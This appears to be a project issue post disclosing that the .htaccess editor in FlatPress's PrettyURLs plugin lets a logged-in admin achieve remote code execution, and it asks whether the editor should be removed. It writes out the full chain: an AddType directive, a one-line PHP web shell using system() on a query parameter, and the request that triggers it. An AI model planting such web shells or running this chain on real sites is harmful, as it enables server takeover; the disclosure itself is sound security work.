As pointed out in #217 by @JuyLang, enabling the site admin to edit the .htaccess file directly may lead to remote code execution (RCE):

• Go to Admin Area / Plugins / PrettyURLs Config
• add AddType application/x-httpd-php .abc to .htaccess content -> this makes your web server treat .abc files as PHP files to be executed
• upload a test.abc file with content some content <?php system($_GET['cmd']); ?>
• Call http://yourflatpress/fp-content/attachs/test.abc?cmd=whoami -> boom, RCE ☠️

Although all of the above is only possible when logged in as site admin properly, it is worth discussing if the .htaccess editor in the PrettyURLs plugin is really neccessary. If not, it should be removed.

Your opinions, please!